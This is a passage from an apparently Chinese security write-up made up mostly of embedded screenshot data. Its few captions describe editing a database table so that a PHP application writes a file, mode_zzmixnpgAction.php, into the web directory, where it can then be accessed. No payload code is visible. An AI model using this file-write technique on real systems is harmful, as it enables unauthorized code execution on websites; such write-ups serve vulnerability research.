d3fGgCgs7no3IHYo2lF9XSu+6IPosKWOtIBivfP+ODxRztn5H/zTZaY7hV29MuVkwwBOquyvz742dnrolaWw8qdJyNmGvet9wE/cHv13fS04rsiKbCVCWQfCZ8x3GeHTGQ2FPyRXJTzm6XN6qn93MCVvKh90TnYlLRdTwr/bLN5zYlDLKwrvdNi/vqKuTx4lvJ7fu6FXN4GL95rAeunyWNJ2+/l/HStzcFpmJUEAHBbfyt/PeHznWPTcz3zNS74ay4lxH0QUqCuJogE29+9+3la6KAEKTqxvfLNLxZygRv4xTsnPKZOJ1eYtyc5hgvAXX8rShAx/dg7+evduIEx+YH4jVB0bGr+oGQgEk5jZbUkAniob1gEG25+G7+msh52JAJgg5U3SLGagS7wbJ3OZNFEkfBBWXn1B5tUVoNuruMB4GJy9mSXcXY8q6Ho9+LjDOupDg5W1rgxwWDBYlKdrhpdeB8VREodz9ECg6njFet++TYTUCJSaaBp5DeabcT/seXwfADsZ1rYdXjgs8Ng9ASGCZvNBrZ7yD+C96wsKXsOTqMAGksSdkccvVAKjkvW7t213p0NAFBxNXr37mNX28cvCVvK3h1dF3P18BKr5xe2zoqYeObP990VBgrnM3+GuQNAY8mPn0XEXS
<p blockindex=72><img src=data:image/png;base64,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
<p blockindex=73>通过数据表可以看到成功修改了数据表中的内容,然后我们需要触发 <code>php</code> 文件的写入</p>
<p blockindex=74><img src=data:image/png;base64,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
<p blockindex=75>找到 <code>mode_zzmixnpgAction.php</code>,可以看到成功写入</p>
<p blockindex=76><img src=data:image/png;base64,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
<p blockindex=77>因为该文件在 web 目录下所以我们可以通过系统的路由方式来访问</p>
<p blockindex=78><img src=data:image/png;base64,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